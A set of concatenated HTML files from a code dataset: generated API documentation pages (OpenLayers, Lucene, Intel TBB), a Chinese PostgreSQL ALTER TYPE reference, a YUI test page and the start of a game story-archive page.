</div>
</div>
</dt>
<dd class="">
<div class="description">
<p>Unlisten for a certain type of event.</p>
</div>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr class="">
<td class="name"><code>type</code></td>
<td class="type">
<span class="param-type">string</span>
|
<span class="param-type">Array.<string></span>
</td>
<td class="description last">
<p>The event type or array of event types.</p></td>
</tr>
<tr class="">
<td class="name"><code>listener</code></td>
<td class="type">
<span class="param-type">function</span>
</td>
<td class="description last">
<p>The listener function.</p></td>
</tr>
<tr class="">
<td class="name"><code>this</code></td>
<td class="type">
<span class="param-type">Object</span>
</td>
<td class="description last">
<p>The object which was used as <code>this</code> by the
<code>listener</code>.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
</dl>
</dd>
<dt class="">
<div class="nameContainer inherited">
<h4 class="name" id="unByKey">
unByKey<span class="signature">(key)</span>
<span class="inherited"><a href="ol.Observable.html#unByKey">inherited</a></span>
</h4>
<div class="tag-source">
src/ol/observable.js, line 114
</div>
</div>
</dt>
<dd class="">
<div class="description">
<p>Removes an event listener using the key returned by <code>on()</code> or <code>once()</code>.
Note that using the <a href="ol.Observable.html#unByKey"><code>ol.Observable.unByKey</code></a> static function is to
be preferred.</p>
</div>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr class="">
<td class="name"><code>key</code></td>
<td class="type">
<span class="param-type">goog.events.Key</span>
</td>
<td class="description last">
<p>The key returned by <code>on()</code> or <code>once()</code>.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
</dl>
</dd>
<dt class="">
<div class="nameContainer inherited">
<h4 class="name" id="unset">
unset<span class="signature">(key)</span>
<span class="inherited"><a href="ol.Object.html#unset">inherited</a></span>
</h4>
<div class="tag-source">
src/ol/object.js, line 229
</div>
</div>
</dt>
<dd class="">
<div class="description">
<p>Unsets a property.</p>
</div>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr class="">
<td class="name"><code>key</code></td>
<td class="type">
<span class="param-type">string</span>
</td>
<td class="description last">
<p>Key name.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
</dl>
</dd>
</dl>
</article>
</section>
<footer>
Documentation generated by <a href="https://github.com/jsdoc3/jsdoc">JSDoc 3.3.0-alpha9</a> on Mon Jul 06 2015 08:45:34 GMT+0200 (CEST)
</footer>
</div>
</div>
<script>prettyPrint();</script>
<script src="scripts/linenumber.js"></script>
<script src="scripts/main.js"></script>
</body>
</html> |
lucene-5.1.0/docs/queries/org/apache/lucene/queries/class-use/CustomScoreQuery.html | marcialhernandez/TecnologiasWeb | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.7.0_67) on Thu Apr 09 10:32:21 MDT 2015 -->
<meta http-equiv="Content-Type" content="text/html" charset="utf-8">
<title>Uses of Class org.apache.lucene.queries.CustomScoreQuery (Lucene 5.1.0 API)</title>
<meta name="date" content="2015-04-09">
<link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Uses of Class org.apache.lucene.queries.CustomScoreQuery (Lucene 5.1.0 API)";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../../../../org/apache/lucene/queries/CustomScoreQuery.html" title="class in org.apache.lucene.queries">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../../../../index.html?org/apache/lucene/queries/class-use/CustomScoreQuery.html" target="_top">Frames</a></li>
<li><a href="CustomScoreQuery.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h2 title="Uses of Class org.apache.lucene.queries.CustomScoreQuery" class="title">Uses of Class<br>org.apache.lucene.queries.CustomScoreQuery</h2>
</div>
<div class="classUseContainer">
<ul class="blockList">
<li class="blockList">
<table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing packages, and an explanation">
<caption><span>Packages that use <a href="../../../../../org/apache/lucene/queries/CustomScoreQuery.html" title="class in org.apache.lucene.queries">CustomScoreQuery</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Package</th>
<th class="colLast" scope="col">Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><a href="#org.apache.lucene.queries">org.apache.lucene.queries</a></td>
<td class="colLast">
<div class="block">Filters and Queries that add to core Lucene.</div>
</td>
</tr>
</tbody>
</table>
</li>
<li class="blockList">
<ul class="blockList">
<li class="blockList"><a name="org.apache.lucene.queries">
<!-- -->
</a>
<h3>Uses of <a href="../../../../../org/apache/lucene/queries/CustomScoreQuery.html" title="class in org.apache.lucene.queries">CustomScoreQuery</a> in <a href="../../../../../org/apache/lucene/queries/package-summary.html">org.apache.lucene.queries</a></h3>
<table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing methods, and an explanation">
<caption><span>Methods in <a href="../../../../../org/apache/lucene/queries/package-summary.html">org.apache.lucene.queries</a> that return <a href="../../../../../org/apache/lucene/queries/CustomScoreQuery.html" title="class in org.apache.lucene.queries">CustomScoreQuery</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code><a href="../../../../../org/apache/lucene/queries/CustomScoreQuery.html" title="class in org.apache.lucene.queries">CustomScoreQuery</a></code></td>
<td class="colLast"><span class="strong">CustomScoreQuery.</span><code><strong><a href="../../../../../org/apache/lucene/queries/CustomScoreQuery.html#clone()">clone</a></strong>()</code> </td>
</tr>
</tbody>
</table>
</li>
</ul>
</li>
</ul>
</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../../../../org/apache/lucene/queries/CustomScoreQuery.html" title="class in org.apache.lucene.queries">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../../../../index.html?org/apache/lucene/queries/class-use/CustomScoreQuery.html" target="_top">Frames</a></li>
<li><a href="CustomScoreQuery.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<p class="legalCopy"><small>
<i>Copyright © 2000-2015 Apache Software Foundation. All Rights Reserved.</i>
<script src='../../../../../prettify.js' type='text/javascript'></script>
<script type='text/javascript'>
(function(){
var oldonload = window.onload;
if (typeof oldonload != 'function') {
window.onload = prettyPrint;
} else {
window.onload = function() {
oldonload();
prettyPrint();
}
}
})();
</script>
</small></p>
</body>
</html>
|
www.jinbuguo.com/postgresql/menu823/sql-altertype.html | Pengfei-Gao/develop-reference-data | <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="zh-CN"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta http-equiv="Content-Language" content="zh-CN"><link href="stylesheet.css" media="all" rel="stylesheet" type="text/css">
<title>ALTER TYPE</title>
<script>var _hmt=_hmt||[]; (function(){ var hm=document.createElement("script"); hm.src="//hm.baidu.com/hm.js?d286c55b63a3c54a1e43d10d4c203e75"; var s=document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm,s); })();</script>
</head><body class="REFENTRY">
<div>
<table summary="Header navigation table" width="100%" border="0" cellpadding="0" cellspacing="0">
<tr><th colspan="5" align="center" valign="bottom">PostgreSQL 8.2.3 中文文档</th></tr>
<tr><td width="10%" align="left" valign="top"><a href="sql-altertrigger.html" accesskey="P">后退</a></td><td width="10%" align="left" valign="top"><a href="sql-altertrigger.html">快退</a></td><td width="60%" align="center" valign="bottom"></td><td width="10%" align="right" valign="top"><a href="sql-alteruser.html">快进</a></td><td width="10%" align="right" valign="top"><a href="sql-alteruser.html" accesskey="N">前进</a></td></tr>
</table>
<hr align="LEFT" width="100%"></div>
<h1><a name="SQL-ALTERTYPE"></a>ALTER TYPE</h1>
<div class="REFNAMEDIV"><a name="AEN45391"></a><h2>名称</h2> ALTER TYPE
-- 修改一个类型的定义</div>
<a name="AEN45394"></a>
<div class="REFSYNOPSISDIV"><a name="AEN45396"></a><h2>语法</h2>
<pre class="SYNOPSIS">ALTER TYPE <tt class="REPLACEABLE"><i>name</i></tt> OWNER TO <tt class="REPLACEABLE"><i>new_owner</i></tt>
ALTER TYPE <tt class="REPLACEABLE"><i>name</i></tt> SET SCHEMA <tt class="REPLACEABLE"><i>new_schema</i></tt>
</pre>
</div>
<div class="REFSECT1"><a name="AEN45402"></a><h2>描述</h2>
<p><tt class="COMMAND">ALTER TYPE</tt> 改变一个现存类型的定义。目前能用的唯一的功能就是修改一个类型的所有者和模式。</p>
<p>要使用 <tt class="COMMAND">ALTER TYPE</tt> ,你必须拥有该类型。要修改一个类型的模式,你还必须在新模式上拥有 <tt class="LITERAL">CREATE</tt> 权限。要修改所有者,你还必须是新的所有角色的直接或间接成员,并且该成员必须在此类型的模式上有 <tt class="LITERAL">CREATE</tt> 权限。这些限制强制了修改该所有者不会做任何通过删除和重建类型不能做的事情。不过,超级用户可以以任何方式修改任意类型的所有权。</p>
</div>
<div class="REFSECT1"><a name="AEN45410"></a><h2>参数</h2>
<div class="VARIABLELIST">
<dl>
<dt><tt class="REPLACEABLE"><i>name</i></tt></dt>
<dd><p>一个需要修改的现有的类型的名字(可以有模式修饰)</p></dd>
<dt><tt class="REPLACEABLE"><i>new_owner</i></tt></dt>
<dd><p>新所有者的用户名</p></dd>
<dt><tt class="REPLACEABLE"><i>new_schema</i></tt></dt>
<dd><p>该类型的新模式</p></dd>
</dl>
</div>
</div>
<div class="REFSECT1"><a name="AEN45429"></a><h2>例子</h2>
<p>要改变一个用户定义类型 <tt class="LITERAL">email</tt> 的所有者为 <tt class="LITERAL">joe</tt> :</p>
<pre class="PROGRAMLISTING">ALTER TYPE email OWNER TO joe;
</pre>
<p>把用户定义类型 <tt class="LITERAL">email</tt> 的模式改变为 <tt class="LITERAL">customers</tt> :</p>
<pre class="PROGRAMLISTING">ALTER TYPE email SET SCHEMA customers;
</pre>
</div>
<div class="REFSECT1"><a name="AEN45439"></a><h2>兼容性</h2>
<p>SQL 标准里没有 <tt class="COMMAND">ALTER TYPE</tt> 语句。</p>
</div>
<div>
<hr align="LEFT" width="100%">
<table summary="Footer navigation table" width="100%" border="0" cellpadding="0" cellspacing="0">
<tr><td width="33%" align="left" valign="top"><a href="sql-altertrigger.html" accesskey="P">后退</a></td><td width="34%" align="center" valign="top"><a href="index.html" accesskey="H">首页</a></td><td width="33%" align="right" valign="top"><a href="sql-alteruser.html" accesskey="N">前进</a></td></tr>
<tr><td width="33%" align="left" valign="top">ALTER TRIGGER</td><td width="34%" align="center" valign="top"><a href="sql-commands.html" accesskey="U">上一级</a></td><td width="33%" align="right" valign="top">ALTER USER</td></tr>
</table>
</div>
</body></html> |
doc/html/a00118.html | Quuxplusone/tbb | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.4"/>
<title>tbb::flow::interface7::receiver< T > Class Template Reference</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<!-- end header part -->
<!-- Generated by Doxygen 1.8.4 -->
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li><a href="pages.html"><span>Related Pages</span></a></li>
<li><a href="modules.html"><span>Modules</span></a></li>
<li><a href="namespaces.html"><span>Namespaces</span></a></li>
<li class="current"><a href="annotated.html"><span>Classes</span></a></li>
<li><a href="files.html"><span>Files</span></a></li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="annotated.html"><span>Class List</span></a></li>
<li><a href="hierarchy.html"><span>Class Hierarchy</span></a></li>
<li><a href="functions.html"><span>Class Members</span></a></li>
</ul>
</div>
<div id="nav-path" class="navpath">
<ul>
<li class="navelem"><a class="el" href="a00232.html">tbb</a></li><li class="navelem"><b>flow</b></li><li class="navelem"><b>interface7</b></li><li class="navelem"><a class="el" href="a00118.html">receiver</a></li> </ul>
</div>
</div><!-- top -->
<div class="header">
<div class="summary">
<a href="#pub-types">Public Types</a> |
<a href="#pub-methods">Public Member Functions</a> |
<a href="#pro-methods">Protected Member Functions</a> |
<a href="#friends">Friends</a> |
<a href="a00319.html">List of all members</a> </div>
<div class="headertitle">
<div class="title">tbb::flow::interface7::receiver< T > Class Template Reference<span class="mlabels"><span class="mlabel">abstract</span></span></div> </div>
</div><!--header-->
<div class="contents">
<p>Pure virtual template class that defines a receiver of messages of type T.
<a href="a00118.html#details">More...</a></p>
<p><code>#include <flow_graph.h></code></p>
<div class="dynheader">
Inheritance diagram for tbb::flow::interface7::receiver< T >:</div>
<div class="dyncontent">
<div class="center">
<img src="a00118.png" usemap="#tbb::flow::interface7::receiver< T >_map" alt=""/>
<map id="tbb::flow::interface7::receiver< T >_map" name="tbb::flow::interface7::receiver< T >_map">
<area href="a00025.html" title="Forwards messages of type T to all successors. " alt="tbb::flow::interface7::broadcast_node< T >" shape="rect" coords="0,56,352,80"/>
<area href="a00027.html" title="Forwards messages in arbitrary order. " alt="tbb::flow::interface7::buffer_node< T, A >" shape="rect" coords="362,56,714,80"/>
<area href="a00084.html" title="Forwards messages only if the threshold has not been reached. " alt="tbb::flow::interface7::limiter_node< T >" shape="rect" coords="724,56,1076,80"/>
<area href="a00097.html" alt="tbb::flow::interface7::overwrite_node< T >" shape="rect" coords="1086,56,1438,80"/>
<area href="a00102.html" title="Forwards messages in priority order. " alt="tbb::flow::interface7::priority_queue_node< T, Compare, A >" shape="rect" coords="181,112,533,136"/>
<area href="a00104.html" title="Forwards messages in FIFO order. " alt="tbb::flow::interface7::queue_node< T, A >" shape="rect" coords="543,112,895,136"/>
<area href="a00169.html" alt="tbb::flow::interface7::write_once_node< T >" shape="rect" coords="1086,112,1438,136"/>
<area href="a00137.html" title="Forwards messages in sequence order. " alt="tbb::flow::interface7::sequencer_node< T, A >" shape="rect" coords="543,168,895,192"/>
</map>
</div></div>
<table class="memberdecls">
<tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="pub-types"></a>
Public Types</h2></td></tr>
<tr class="memitem:a16eccc851b858604344bb8f1bb9eedc8"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a16eccc851b858604344bb8f1bb9eedc8"></a>
typedef T </td><td class="memItemRight" valign="bottom"><a class="el" href="a00118.html#a16eccc851b858604344bb8f1bb9eedc8">input_type</a></td></tr>
<tr class="memdesc:a16eccc851b858604344bb8f1bb9eedc8"><td class="mdescLeft"> </td><td class="mdescRight">The input type of this receiver. <br/></td></tr>
<tr class="separator:a16eccc851b858604344bb8f1bb9eedc8"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:afbadf5511bd568d283040cd88bd4e81e"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="afbadf5511bd568d283040cd88bd4e81e"></a>
typedef <a class="el" href="a00136.html">sender</a>< T > </td><td class="memItemRight" valign="bottom"><a class="el" href="a00118.html#afbadf5511bd568d283040cd88bd4e81e">predecessor_type</a></td></tr>
<tr class="memdesc:afbadf5511bd568d283040cd88bd4e81e"><td class="mdescLeft"> </td><td class="mdescRight">The predecessor type for this node. <br/></td></tr>
<tr class="separator:afbadf5511bd568d283040cd88bd4e81e"><td class="memSeparator" colspan="2"> </td></tr>
</table><table class="memberdecls">
<tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="pub-methods"></a>
Public Member Functions</h2></td></tr>
<tr class="memitem:a733889a9053478ef2fb2528e2205bf07"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a733889a9053478ef2fb2528e2205bf07"></a>
virtual </td><td class="memItemRight" valign="bottom"><a class="el" href="a00118.html#a733889a9053478ef2fb2528e2205bf07">~receiver</a> ()</td></tr>
<tr class="memdesc:a733889a9053478ef2fb2528e2205bf07"><td class="mdescLeft"> </td><td class="mdescRight">Destructor. <br/></td></tr>
<tr class="separator:a733889a9053478ef2fb2528e2205bf07"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:aee5067bb4f4b71ffa786c1b33cb9aa6a"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="aee5067bb4f4b71ffa786c1b33cb9aa6a"></a>
bool </td><td class="memItemRight" valign="bottom"><a class="el" href="a00118.html#aee5067bb4f4b71ffa786c1b33cb9aa6a">try_put</a> (const T &t)</td></tr>
<tr class="memdesc:aee5067bb4f4b71ffa786c1b33cb9aa6a"><td class="mdescLeft"> </td><td class="mdescRight">Put an item to the receiver. <br/></td></tr>
<tr class="separator:aee5067bb4f4b71ffa786c1b33cb9aa6a"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a16427aa709505de93ffe0d79136e4251"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a16427aa709505de93ffe0d79136e4251"></a>
virtual bool </td><td class="memItemRight" valign="bottom"><a class="el" href="a00118.html#a16427aa709505de93ffe0d79136e4251">register_predecessor</a> (<a class="el" href="a00118.html#afbadf5511bd568d283040cd88bd4e81e">predecessor_type</a> &)</td></tr>
<tr class="memdesc:a16427aa709505de93ffe0d79136e4251"><td class="mdescLeft"> </td><td class="mdescRight">Add a predecessor to the node. <br/></td></tr>
<tr class="separator:a16427aa709505de93ffe0d79136e4251"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a55adae6228bbdc1539695e1ec20e9762"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a55adae6228bbdc1539695e1ec20e9762"></a>
virtual bool </td><td class="memItemRight" valign="bottom"><a class="el" href="a00118.html#a55adae6228bbdc1539695e1ec20e9762">remove_predecessor</a> (<a class="el" href="a00118.html#afbadf5511bd568d283040cd88bd4e81e">predecessor_type</a> &)</td></tr>
<tr class="memdesc:a55adae6228bbdc1539695e1ec20e9762"><td class="mdescLeft"> </td><td class="mdescRight">Remove a predecessor from the node. <br/></td></tr>
<tr class="separator:a55adae6228bbdc1539695e1ec20e9762"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a6eb0f353746d17af003c9a87fb47a5a6"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a6eb0f353746d17af003c9a87fb47a5a6"></a>
virtual void </td><td class="memItemRight" valign="bottom"><b>internal_add_built_predecessor</b> (<a class="el" href="a00118.html#afbadf5511bd568d283040cd88bd4e81e">predecessor_type</a> &)=0</td></tr>
<tr class="separator:a6eb0f353746d17af003c9a87fb47a5a6"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a27b36a8e03fa43f74ebd796f73ecfbfc"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a27b36a8e03fa43f74ebd796f73ecfbfc"></a>
virtual void </td><td class="memItemRight" valign="bottom"><b>internal_delete_built_predecessor</b> (<a class="el" href="a00118.html#afbadf5511bd568d283040cd88bd4e81e">predecessor_type</a> &)=0</td></tr>
<tr class="separator:a27b36a8e03fa43f74ebd796f73ecfbfc"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a2cd7a962f3d4ec462bfa09165a47e6d5"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a2cd7a962f3d4ec462bfa09165a47e6d5"></a>
virtual void </td><td class="memItemRight" valign="bottom"><b>copy_predecessors</b> (std::vector< <a class="el" href="a00118.html#afbadf5511bd568d283040cd88bd4e81e">predecessor_type</a> * > &)=0</td></tr>
<tr class="separator:a2cd7a962f3d4ec462bfa09165a47e6d5"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a708474643ea80fe4a05bde83865e8f6f"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a708474643ea80fe4a05bde83865e8f6f"></a>
virtual size_t </td><td class="memItemRight" valign="bottom"><b>predecessor_count</b> ()=0</td></tr>
<tr class="separator:a708474643ea80fe4a05bde83865e8f6f"><td class="memSeparator" colspan="2"> </td></tr>
</table><table class="memberdecls">
<tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="pro-methods"></a>
Protected Member Functions</h2></td></tr>
<tr class="memitem:a3581a59d59476fffdc7caeea06c26371"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a3581a59d59476fffdc7caeea06c26371"></a>
virtual task * </td><td class="memItemRight" valign="bottom"><b>try_put_task</b> (const T &t)=0</td></tr>
<tr class="separator:a3581a59d59476fffdc7caeea06c26371"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:ac902b1e09eea9748223eb50dc38d3575"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ac902b1e09eea9748223eb50dc38d3575"></a>
virtual void </td><td class="memItemRight" valign="bottom"><b>reset_receiver</b> (__TBB_PFG_RESET_ARG(reset_flags f=rf_reset_protocol))=0</td></tr>
<tr class="separator:ac902b1e09eea9748223eb50dc38d3575"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:ae91eab3e06d4139ac38f143c74fe9eab"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ae91eab3e06d4139ac38f143c74fe9eab"></a>
virtual bool </td><td class="memItemRight" valign="bottom"><b>is_continue_receiver</b> ()</td></tr>
<tr class="separator:ae91eab3e06d4139ac38f143c74fe9eab"><td class="memSeparator" colspan="2"> </td></tr>
</table><table class="memberdecls">
<tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="friends"></a>
Friends</h2></td></tr>
<tr class="memitem:abaf9bf74ca5f2854d09f5f07337280eb"><td class="memTemplParams" colspan="2"><a class="anchor" id="abaf9bf74ca5f2854d09f5f07337280eb"></a>
template<typename R , typename B > </td></tr>
<tr class="memitem:abaf9bf74ca5f2854d09f5f07337280eb"><td class="memTemplItemLeft" align="right" valign="top">class </td><td class="memTemplItemRight" valign="bottom"><a class="el" href="a00118.html#abaf9bf74ca5f2854d09f5f07337280eb">run_and_put_task</a></td></tr>
<tr class="memdesc:abaf9bf74ca5f2854d09f5f07337280eb"><td class="mdescLeft"> </td><td class="mdescRight">put item to successor; return task to run the successor if possible. <br/></td></tr>
<tr class="separator:abaf9bf74ca5f2854d09f5f07337280eb"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a1360e38efe396058978cf3754ad620f5"><td class="memTemplParams" colspan="2"><a class="anchor" id="a1360e38efe396058978cf3754ad620f5"></a>
template<typename X , typename Y > </td></tr>
<tr class="memitem:a1360e38efe396058978cf3754ad620f5"><td class="memTemplItemLeft" align="right" valign="top">class </td><td class="memTemplItemRight" valign="bottom"><b>internal::broadcast_cache</b></td></tr>
<tr class="separator:a1360e38efe396058978cf3754ad620f5"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:acbd9ac2610587a99cd7d43344297cc49"><td class="memTemplParams" colspan="2"><a class="anchor" id="acbd9ac2610587a99cd7d43344297cc49"></a>
template<typename X , typename Y > </td></tr>
<tr class="memitem:acbd9ac2610587a99cd7d43344297cc49"><td class="memTemplItemLeft" align="right" valign="top">class </td><td class="memTemplItemRight" valign="bottom"><b>internal::round_robin_cache</b></td></tr>
<tr class="separator:acbd9ac2610587a99cd7d43344297cc49"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a05ec930a348f7eed564236d00edbda24"><td class="memTemplParams" colspan="2"><a class="anchor" id="a05ec930a348f7eed564236d00edbda24"></a>
template<typename U > </td></tr>
<tr class="memitem:a05ec930a348f7eed564236d00edbda24"><td class="memTemplItemLeft" align="right" valign="top">class </td><td class="memTemplItemRight" valign="bottom"><a class="el" href="a00118.html#a05ec930a348f7eed564236d00edbda24">limiter_node</a></td></tr>
<tr class="memdesc:a05ec930a348f7eed564236d00edbda24"><td class="mdescLeft"> </td><td class="mdescRight">put receiver back in initial state <br/></td></tr>
<tr class="separator:a05ec930a348f7eed564236d00edbda24"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a73cd25db4e6e9497940262f70f3ffc54"><td class="memTemplParams" colspan="2"><a class="anchor" id="a73cd25db4e6e9497940262f70f3ffc54"></a>
template<typename TT , typename M > </td></tr>
<tr class="memitem:a73cd25db4e6e9497940262f70f3ffc54"><td class="memTemplItemLeft" align="right" valign="top">class </td><td class="memTemplItemRight" valign="bottom"><b>internal::successor_cache</b></td></tr>
<tr class="separator:a73cd25db4e6e9497940262f70f3ffc54"><td class="memSeparator" colspan="2"> </td></tr>
</table>
<a name="details" id="details"></a><h2 class="groupheader">Detailed Description</h2>
<div class="textblock"><h3>template<typename T><br/>
class tbb::flow::interface7::receiver< T ></h3>
<p>Pure virtual template class that defines a receiver of messages of type T. </p>
</div><hr/>The documentation for this class was generated from the following file:<ul>
<li><a class="el" href="a00189.html">flow_graph.h</a></li>
</ul>
</div><!-- contents -->
<hr>
<p></p>
Copyright © 2005-2014 Intel Corporation. All Rights Reserved.
<p></p>
Intel, Pentium, Intel Xeon, Itanium, Intel XScale and VTune are
registered trademarks or trademarks of Intel Corporation or its
subsidiaries in the United States and other countries.
<p></p>
* Other names and brands may be claimed as the property of others.
|
sites/all/libraries/yui/tests/app/tests/manual/lazy-model-list/lml-profile.html | artefactual-labs/trac | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>LazyModelList Profile</title>
</head>
<body>
<h1>LazyModelList Profile</h1>
<button id="create">Create List</button>
<button id="revive">Revive List</button>
<button id="free">Free List</button>
<button id="destroy">Destory List</button>
<script src="../../../../../build/yui/yui.js"></script>
<script>
// Hang var out in global scope so it isn't GC'd.
var list;
YUI({filter: 'raw'}).use('node-base', 'lazy-model-list', function (Y) {
Y.one('#create').on('click', function (e) {
var items = [],
i;
for (i = 0; i < 1000; i += 1) {
items.push({
foo: 'foo',
bar: 1,
baz: false,
zee: [1, 2, 3, 4, 5]
});
}
list = new Y.LazyModelList();
list.reset(items);
});
Y.one('#revive').on('click', function (e) {
list.revive();
});
Y.one('#free').on('click', function (e) {
list.free();
});
Y.one('#destroy').on('click', function (e) {
list.destroy();
});
});
</script>
</body>
</html>
|
BFJPStoryArchive/BFJPStoryArchive/map106-dungeon4.html | Blackrobe/blackrobe.github.io | <!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel="stylesheet" type="text/css" href="style/style.css">
<link rel="stylesheet" type="text/css" media="only screen and (min-device-width: 360px)" href="style-compact.css">
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-74917613-1', 'auto');
ga('send', 'pageview');
</script>
</head>
<body>
<div class="dungeonBackgroundContainer">
<img class="dungeonFrame" src="../../BFStoryArchive/BFStoryArchive/dungeon_battle_collection/baseDungeonFrame.png" />
<img class="dungeonImage" src="../../BFStoryArchive/BFStoryArchive/dungeon_battle_collection/dungeon_battle_81063.jpg" />
</div>
<div class="dialogueContainer">
